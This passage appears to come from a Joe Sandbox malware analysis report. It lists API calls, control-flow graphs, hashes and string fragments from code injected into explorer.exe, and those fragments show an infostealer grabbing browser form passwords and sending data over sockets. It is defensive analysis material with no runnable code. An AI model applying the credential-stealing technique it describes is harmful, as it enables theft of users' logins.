386 f0047d6-f0047f6 call f004942 380->386 387 f0047fc-f004803 380->387 383->395 384->348 384->383 386->387 393 f004805-f004825 call f004942 387->393 394 f00482b-f004835 387->394 391->318 393->394 394->348 400 f004837-f00483e 394->400 395->318 400->348 404 f004840-f004886 400->404 404->395
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: CreateFile
                                • String ID: `
                                • API String ID: 823142352-2679148245
                                • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                • Instruction ID: 867550aca778260230ed74bc7e89889778c90641bb6d2d2a5b75672c4b1172d2
                                • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                • Instruction Fuzzy Hash: 8A226F74A18B099FDB99EF28C4947ADF7E1FB98301F80022EE55ED7291DB30A451CB85

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 443 f005e12-f005e38 444 f005e45-f005e6e NtProtectVirtualMemory 443->444 445 f005e40 call f004942 443->445 446 f005e70-f005e7c 444->446 447 f005e7d-f005e8f 444->447 445->444
                                APIs
                                • NtProtectVirtualMemory.NTDLL ref: 0F005E67
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                • Instruction ID: 9aeaa220fddc53a2dab6fea66dfd4c532f06a12c0311c7365813960fd3a16ef6
                                • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                • Instruction Fuzzy Hash: 03019E34628B884F9B88EF6CD48022AB7E4FBCD214F000B3EA99AC3250EB64C5414B42

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 448 f005e0a-f005e6e call f004942 NtProtectVirtualMemory 451 f005e70-f005e7c 448->451 452 f005e7d-f005e8f 448->452
                                APIs
                                • NtProtectVirtualMemory.NTDLL ref: 0F005E67
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: MemoryProtectVirtual
                                • String ID:
                                • API String ID: 2706961497-0
                                • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                • Instruction ID: 0a66c17933529aefc8bc4d69bcbf8acc616edfb3751deec87e7fae939de42141
                                • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                • Instruction Fuzzy Hash: 5501A734628B884B9748EB3C94412A6B3E5FBCE314F000B7EE9DAC3241DB25D5024782

                                Control-flow Graph

                                APIs
                                • ObtainUserAgentString.URLMON ref: 0EFFF9A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: AgentObtainStringUser
                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                • API String ID: 2681117516-319646191
                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                • Instruction ID: 64db2468a5f6fca71eddbdbc532ccc07d1c2386b0d0490cc249be235b4a92e9c
                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                • Instruction Fuzzy Hash: 9731D131614B0C8BDB14FFA8C8987EEB7E1FF58204F44022AD54ED7291DE788645C789

                                Control-flow Graph

                                APIs
                                • ObtainUserAgentString.URLMON ref: 0EFFF9A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: AgentObtainStringUser
                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                • API String ID: 2681117516-319646191
                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                • Instruction ID: b4dfb9f145f5b77c583944c1d2e1bcdd0b60f024a6d0e894448369f3d9011535
                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                • Instruction Fuzzy Hash: 0B21D531A14B0C8BDB14FFA8C8587EE7BE1FF58204F44422AD55AD7291DF788605CB89

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 232 effbb66-effbb68 233 effbb6a-effbb71 232->233 234 effbb93-effbbb8 232->234 236 effbbbb-effbc22 call f002612 call f004942 * 2 233->236 237 effbb73-effbb92 233->237 234->236 244 effbcdc 236->244 245 effbc28-effbc2b 236->245 237->234 246 effbcde-effbcf6 244->246 245->244 247 effbc31-effbcb0 call f006da4 call f006022 call f0063e2 call f006022 call f0063e2 245->247 259 effbcb5-effbcca CreateMutexExW 247->259 260 effbcce-effbcd3 259->260 260->244 261 effbcd5-effbcda 260->261 261->246
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: CreateMutex
                                • String ID: .dll$el32$kern
                                • API String ID: 1964310414-1222553051
                                • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                • Instruction ID: 9561189ba9fe3850b53ab32f688b5f65b8a516cf9ac097f3529c81ea5e79d2b7
                                • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                • Instruction Fuzzy Hash: 3E418D70918A08CFDB54EFA8C8987ED77E0FF98300F00417AD94ADB266EE349945CB85

                                Control-flow Graph

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: CreateMutex
                                • String ID: .dll$el32$kern
                                • API String ID: 1964310414-1222553051
                                • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                • Instruction ID: 88b74770414e564d4daed973454901919eed89476d14f0e2d0e567c595b446ce
                                • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                • Instruction Fuzzy Hash: 5C413C74918A088FDB44EFA8C498BED77E1FF58300F04417AD94ADB256DE349945CB85

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 289 f00172e-f001768 290 f001788-f0017ab connect 289->290 291 f00176a-f001782 call f004942 289->291 291->290
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: connect
                                • String ID: conn$ect
                                • API String ID: 1959786783-716201944
                                • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                • Instruction ID: 9bf39383080cd17c099d7baba197163854b774cc3f79b05d8fb80df1c8bb51ec
                                • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                • Instruction Fuzzy Hash: 67015E30618B188FCB94EF1CE088B55B7E0FB58314F1545AEE90DCB266CA74D8818BC2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 294 f001732-f001768 295 f001788-f0017ab connect 294->295 296 f00176a-f001782 call f004942 294->296 296->295
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: connect
                                • String ID: conn$ect
                                • API String ID: 1959786783-716201944
                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                • Instruction ID: 2160b624ba85c141bd7c89e29a32f65f24c78b014d88a4e1b65df4af3c3a664b
                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                • Instruction Fuzzy Hash: 2B012C70618A1C8FCB94EF5CE088B55B7E0FB59314F1541AEA90DCB266CA74C9818BC2

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 407 f0016b2-f0016e5 408 f001705-f00172d send 407->408 409 f0016e7-f0016ff call f004942 407->409 409->408
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: send
                                • String ID: send
                                • API String ID: 2809346765-2809346765
                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                • Instruction ID: 54c3c5ec9c36625c6a7e584e00e9367bed9f397bf39665be9e1661afd1566e7a
                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                • Instruction Fuzzy Hash: 28011270518A188FDBC4EF1CD048B2577E0EB58315F1545AED95DCB266C670D8818B85

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 412 f0015b2-f0015ea 413 f00160a-f00162b socket 412->413 414 f0015ec-f001604 call f004942 412->414 414->413
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: socket
                                • String ID: sock
                                • API String ID: 98920635-2415254727
                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                • Instruction ID: c1ceebbc8cb74b343f831ddd6a9487f0dffa4a4a25db4bd7bcbafae7b0069374
                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                • Instruction Fuzzy Hash: 59017C30618B188FCB84EF1CE048B50BBE0FB59314F1545AEE80ECB266C7B0C9818B86

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 417 eff92dd-eff9320 call f004942 420 eff93fa-eff940e 417->420 421 eff9326 417->421 422 eff9328-eff9339 SleepEx 421->422 422->422 423 eff933b-eff9341 422->423 424 eff934b-eff9352 423->424 425 eff9343-eff9349 423->425 427 eff9354-eff935a 424->427 428 eff9370-eff9376 424->428 425->424 426 eff935c-eff936a call f003f12 425->426 426->428 427->426 427->428 430 eff9378-eff937e 428->430 431 eff93b7-eff93bd 428->431 430->431 435 eff9380-eff938a 430->435 432 eff93bf-eff93cf call eff9e72 431->432 433 eff93d4-eff93db 431->433 432->433 433->422 438 eff93e1-eff93f5 call eff90f2 433->438 435->431 436 eff938c-eff93b1 call effa432 435->436 436->431 438->422
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: Sleep
                                • String ID:
                                • API String ID: 3472027048-0
                                • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                • Instruction ID: 10e8b56569ba6081a6672cefeefc7cebc59bb58e936ec923056d1dc87b2ceb74
                                • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                • Instruction Fuzzy Hash: 37318E70A14B09DADB64EFA980A83E5B3A0FF84300F44467FCA1DC7166CBB49850CF91

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 453 eff9412-eff9446 call f004942 456 eff9448-eff9472 call f006c9e CreateThread 453->456 457 eff9473-eff947d 453->457
                                APIs
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                • Instruction ID: dfb90b5456320ab2aafa27aadfd5f0e7c8e273bddd008cb8b7cb103e715acda1
                                • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                • Instruction Fuzzy Hash: 16F0C230668B484FEB88EB2CD44567AB3D0EBE8214F44463EAA4DC3265DA69C5824716
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                • API String ID: 0-393284711
                                • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                • Instruction ID: 21cb65c928a2c365979b023611167957acb171c9bae856e7214da9682144826a
                                • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                • Instruction Fuzzy Hash: 2EE16B70518F488FC765EF68C4847AAB7E0FB98301F504A2E959FC7292DF34A545CB89
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                • API String ID: 0-2916316912
                                • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                • Instruction ID: 649d4f3da25b61696cbbb5aa013070136dae37e0b9d8fa9a3899a5e88ef8f046
                                • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                • Instruction Fuzzy Hash: 0EB17C30518B488EDB55EF68C485AEEB7F1FF98300F50491ED49AC72A2EF749505CB86
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                • API String ID: 0-1539916866
                                • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                • Instruction ID: b5af10472b5eb96a4ccaf8712c13cd0ac4e01e19a3aeeb5184b87b3eb04f4fc9
                                • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                • Instruction Fuzzy Hash: 0841B170A18B088FDB14DF88A8456BD7BE6FB88700F40025ED409D3396DBB5AD458BD6
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                • API String ID: 0-355182820
                                • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                • Instruction ID: 3783c608278c817755ba40014dac05d959af88c71c14c3988776ed8e26802b48
                                • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                • Instruction Fuzzy Hash: 7DC19C30618B088FC75AEF68C485AEAF3E5FB94304F40472E959EC7252DF34A515CB86
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                • API String ID: 0-97273177
                                • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                • Instruction ID: 246bdfb6db15b7f0b98b061ea1fcd88d71874d154ffb1141f221e080fac3ffa7
                                • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                • Instruction Fuzzy Hash: DD51B2315187488FD71ADF58D8812AAB7E5FBC5700F501A2EE8CBC7282DBB49546CB82
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                • API String ID: 0-639201278
                                • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                • Instruction ID: 0e3d10c549a39cd256396b99478781461282f7ce3ef8f885b0038395899d474e
                                • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                • Instruction Fuzzy Hash: 54C1A070618B194FC759EB68C495AEAF3E5FB98300F944329940AC7292DF34EA458B86
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                • API String ID: 0-639201278
                                • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                • Instruction ID: e60ae503b4c0d63416a4ceff4a0c491730cc14b6d150c97f8d3d87f78797712d
                                • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                • Instruction Fuzzy Hash: F3C1AF70618B194FC759EF68C495AEAF3E5FB98300F944329940EC7292DF34EA458B86
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: UR$2$L: $Pass$User$name$word
                                • API String ID: 0-2058692283
                                • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                • Instruction ID: 3320df95cff756454f915678fd7fbb1359f37cfa048287297503e2dcf934ba06
                                • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                • Instruction Fuzzy Hash: 11A1D330A187488FDB29EFA8D444BEEB7E5FF98300F40462DD48AD7292EF3495458B85
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: UR$2$L: $Pass$User$name$word
                                • API String ID: 0-2058692283
                                • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                • Instruction ID: 8d17d4f48b289841ae466db46c82eb22062a31f1594b8866ea56a025c72daafd
                                • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                • Instruction Fuzzy Hash: 7291C030A187488FDB29EFA8D444BEEB7E5FF98300F40462DD48AD7292EF7495458B85
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: $.$e$n$v
                                • API String ID: 0-1849617553
                                • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                • Instruction ID: 0b209ef10bd39f4b8cb00b2475629ce0134420f915583b278a50886f7113b46f
                                • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                • Instruction Fuzzy Hash: 0671B731A18B498FD759EFA8C4847AAB7F5FF98304F00062ED44AC7262EF75D9458B81
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: 2.dl$dll$l32.$ole3$shel
                                • API String ID: 0-1970020201
                                • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                • Instruction ID: 1afc90f8ea3b5095690a5e0d3d4c18d8a62d976574e964be7a25fd0b35f3f221
                                • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                • Instruction Fuzzy Hash: 4E517DB0918B4C8FDB55EFA4C044AEEB7F1FF68300F40462EA59AE7255EF3095448B89
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: 4$\$dll$ion.$vers
                                • API String ID: 0-1610437797
                                • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                • Instruction ID: 2be03b46b518aa0157ca78de1ace27ca131f6a50d71ab77a9c4545fc7f7e323c
                                • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                • Instruction Fuzzy Hash: A2417030618B498FDBB9EF6498457EA73E4FB98301F50462E994ECB282EF30D545C782
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: 32.d$cli.$dll$sspi$user
                                • API String ID: 0-327345718
                                • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                • Instruction ID: d9e38580fbb32bbe31e65477766ea9e44b31664fa08b3d86c2e74122eca094a1
                                • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                • Instruction Fuzzy Hash: 49417130A18F0DCFCB59EF6980947AD77E5FBA8300F50056A980ED7292DEB5D5818B86
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .dll$el32$h$kern
                                • API String ID: 0-4264704552
                                • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                • Instruction ID: 176ca4fa30a9f4a7965552072f33f4d5d20b65efa73639706ff424b378344fd0
                                • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                • Instruction Fuzzy Hash: 9641B670608B4D4FD769DF2880943AAB7D1FBD8340F64462F949EC7296DB70D445CB42
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: $Snif$f fr$om:
                                • API String ID: 0-3434893486
                                • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                • Instruction ID: f3401bf86a6a20b9fec4c3c21d05258ab395fe6f16424e0514305b41d7e860e6
                                • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                • Instruction Fuzzy Hash: B731C17150CB886FD72AEB28C4846DAB7D4FBC4300F50491EE49BC7293EE35A54ACB42
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: $Snif$f fr$om:
                                • API String ID: 0-3434893486
                                • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                • Instruction ID: 2a6943b504708fcda20f51c6fe0cda22bcbfe57f24bae5c59e71bc59fa05e19a
                                • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                • Instruction Fuzzy Hash: 3631C171508B486FD72AEB28C4846EAB7D4FBD4300F50491EE49BC7297EE34E54ACB42
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .dll$chro$hild$me_c
                                • API String ID: 0-3136806129
                                • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                • Instruction ID: b7d10f9a1996577ff317411533e40ffcab23cbc6d6ba28ff5b08e59beeaa9ae7
                                • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                • Instruction Fuzzy Hash: 01318E70118B484FCB86EF688494BAAB7E1FFD8301F94462DA44ECB2A6DF34D545CB52
                                Strings
                                Memory Dump Source
                                • Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_6_2_f910000_explorer.jbxd
                                Similarity
                                • API ID:
                                • String ID: .dll$chro$hild$me_c
                                • API String ID: 0-3136806129
                                • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                • Instruction ID: 3597cef6b7e795d5c0e6d520152fca7bef545b935d4e37cd61fd46e8439f7e4c
                                • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                • Instruction Fuzzy Hash: 64317E70118B484FCB96EF688494BAAB7E1FFD8300F94462DA44ACB2A6DF34D545CB52
                                Strings
                                Memory Dump Source
